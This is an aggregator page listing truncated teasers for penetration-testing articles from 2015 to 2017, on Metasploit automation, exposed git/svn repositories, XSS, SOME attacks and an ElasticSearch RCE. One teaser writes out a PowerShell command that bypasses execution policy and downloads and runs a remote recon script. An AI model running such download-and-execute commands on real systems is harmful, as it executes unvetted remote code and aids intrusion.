HackDig : Dig high-quality web security articles for hacker

WiNX: The Ultra-Portable Wireless Attacking Platform

When you are performing penetration tests for your customers, you need to build your personal arsenal. Tools, pieces of hardware and software are collected here and there depending on your engagements to increase your toolbox. To perform Wireless intrusion tests, I’m a big fan of the WiFi Pineapple. I’ve one for years (model MK5). It’s not
Publish At:2017-09-29 02:25 | Read:115 | Comments:0 | Tags:Pentesting Security Social Engineering Hardware WiFi WiNX Wi

The Top 13 Information Security Conferences of 2017

2017 is finally here. You know what that means: another information security conference season is upon us. We couldn’t be more excited!Just like we did last year, we at The State of Security have assembled a list of the top 13 conferences in information security for 2017. We hope you’ll have the chance to attend at least one of these events this
Publish At:2017-01-11 12:55 | Read:1031 | Comments:0 | Tags:Off Topic Conferences CTF hacking Information Security pente

Finding and Exploiting Same Origin Method Execution vulnerabilities

Recently it came to my attention that it was possible to abuse JSONP callbacks using a vulnerability known as SOME – Same Origin Method Execution which can be used by an attacker to widely abuse a user’s trust between the web application and the intended flow of execution. For example, using the SOME attack it is possible for an attacker to trick
Publish At:2015-12-31 16:50 | Read:1397 | Comments:0 | Tags:exploitation Open Source pentesting pentura privacy security

[IRCCloud] History and Another XSS Bug Bounty

Personally, I have been a user of IRC since 2004 on some private networks and some other well-known ones such as Freenode. However, it was always inconvenient to have to set up an IRC Bouncer, so when IRCCloud came around, I was excited to try it and see if it provided me with a method of staying connected to all the required networks without having to downl
Publish At:2015-10-14 11:40 | Read:839 | Comments:0 | Tags:fuzzing infosec pentesting pentura security Software Vulnera

Fuzzing for Fun and Profit

So as you do, I was just looking around, manually fuzzing some Web Sockets requests, seeing if I could get any sort of XSS, Remote IRC Command Injection or SQLi mainly – ended up that I didn’t find much there that worse worth noting. So I started seeing if their logic was all alright, so one of their requests looked similar to: {“_reqid”:1234, “cid”:5678, “t
Publish At:2015-10-13 17:40 | Read:914 | Comments:0 | Tags:exploitation fuzzing infosec pentesting pentura security Sof

Metasploit + VHOSTS in mass

maybe this was a solved problem but I couldn't find a solution online.Problem #1:Metasploit RHOSTS takes the file parameter so you can pass in a list of ip ranges. It will also take hostnames  as long as they resolve. If you have giant list of stuff and one of them doesn't resolve then the RHOSTS wont load and you'll want to cry.Problem #2:Lots of proxy
Publish At:2015-08-18 12:10 | Read:895 | Comments:0 | Tags:Metasploit Pentesting resource scripts scripting

Does My Job Even Matter? A Dose of InfoSec Career Perspective

If you work in an enterprise defense role, chances are your day is comprised of coffee, email, meetings, crises, coffee, interruptions, coffee, and meetings (and, most likely, alcohol). The meetings seem useless and the interruptions unceasing. Your stress piles up while your family time dwindles, and you find yourself wondering at the end of the day (or dur
Publish At:2015-07-09 12:30 | Read:816 | Comments:0 | Tags:Featured Articles IT Security and Data Protection Informatio

Running System Commands Against Multiple SSH Servers with Fabric

Fabric is a python library to automate tasksAs the README says:Fabric is a Python (2.5-2.7) library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks. More specifically, Fabric is:A tool that lets you execute arbitrary Python functions via the command line;A library of subroutines (built on
Publish At:2015-04-09 00:25 | Read:839 | Comments:0 | Tags:automation Fabric OMG Python Pentesting

Running System Commands Against Multiple SSH Servers With Metasploit

Want:To run a command against multiple SSH servers and you want to use metasploit to do itHow:There doesn't exist a multi_ssh_exec type aux module to run commands. Luckily ? the ssh_login module creates a command shell session for you, on successful logins. You can use the builtin sessions functionality to run a command against all your (SSH) sessions.msf au
Publish At:2015-04-07 00:20 | Read:830 | Comments:0 | Tags:automation Metasploit Pentesting

DevOoops: Revision Control (git)

Exposed git resources is probably the most gruesome low2pwned issues out there right now.Leaving this exposed allows an attacker to potentially download the full source of the site along with any other files that are in the git repository.Ron's blog post on skullsecurity (see Resources) was my first exposure to the subject. I actually blogged about it back i
Publish At:2015-03-23 23:35 | Read:868 | Comments:0 | Tags:devops Pentesting

Metasploit and MSGRPC

I wanted to automate connecting to MSGRPC. I did find a few older tutorials on the subject:http://blog.spiderlabs.com/2012/01/scripting-metasploit-using-msgrpc-.htmlhttp://jumpespjump.blogspot.com/2013/05/metasploit-msgrpc-with-python-on-kali.htmlhttps://www.fishnetsecurity.com/6labs/blog/scripting-metasploit-pythonhttps://khr0x40sh.wordpress.com/2012/05/htt
Publish At:2015-03-16 15:35 | Read:849 | Comments:0 | Tags:Metasploit OMG Python Pentesting

ElasticSearch CVE-2015-1427 RCE Exploit

References:https://www.elastic.co/blog/elasticsearch-1-4-3-and-1-3-8-released/https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/http://www.theregister.co.uk/2015/03/10/elastic_search_vuln/?mt=1426090760048Since the exploit is  already out here [XiphosResearch github] and here [in a comment :-) ]
Publish At:2015-03-11 23:30 | Read:1030 | Comments:0 | Tags:devops elasticsearch Pentesting exploit

PowerShell-AD-Recon by PyroTek3

Found a couple of fun PowerShell enumeration scripts here:https://github.com/PyroTek3/PowerShell-AD-ReconC:temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"Processing XX (user and computer) accounts
Publish At:2015-03-09 23:25 | Read:1135 | Comments:0 | Tags:enumeration Pentesting post-exploitation powershell

DevOoops: Revision Control (Subversion)

Subversion 1.6 (and earlier)Check for .entries filesWalk svn chain to retrieve sourceExample:http://somedomain.com/.svn/text-base/index.php.svn-basehttp://somedomain.com/.svn/entriesMetasploit Auxiliary Module:auxiliary/scanner/http/svn_scannermsf auxiliary(svn_scanner) > run[*] Using code '404' as not found.[+] [1.2.3.52:80] SVN Entries file found.[*] [1
Publish At:2015-03-02 15:55 | Read:1194 | Comments:0 | Tags:devops Pentesting

The Evil CVE: CVE-666-666 – “Report Not Read”

I had an interesting discussion with a friend this morning. He explained that, when he is conducting a pentest, he does not hesitate to add sometimes in his report a specific finding regarding the lack of attention given to the previous reports. If some companies are motivated by good intentions and ask for regular pentests against their infrastructure or a
Publish At:2015-02-27 00:45 | Read:1043 | Comments:0 | Tags:Pentesting Security CVE Pentest Report

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud